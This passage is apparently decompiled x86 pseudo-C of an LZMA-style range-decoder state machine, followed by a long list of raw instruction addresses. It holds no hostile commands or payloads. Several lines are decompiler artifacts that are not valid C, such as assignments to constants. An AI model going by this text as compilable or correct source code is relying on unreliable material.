							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040667f
0x0040667f
0x00406683
0x0040673a
0x0040673d
0x00406749
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00000000
0x00406a12
0x00406689
0x0040668d
0x00406bce
0x00406bce
0x00406bd1
0x00406bd5
0x00406bd5
0x00406693
0x00406699
0x0040669c
0x004066a0
0x004066a3
0x004066a7
0x00406b6d
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00000000
0x00406bca
0x004066ad
0x004066b0
0x004066b6
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x004066e1
0x004066e1
0x004066e1
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
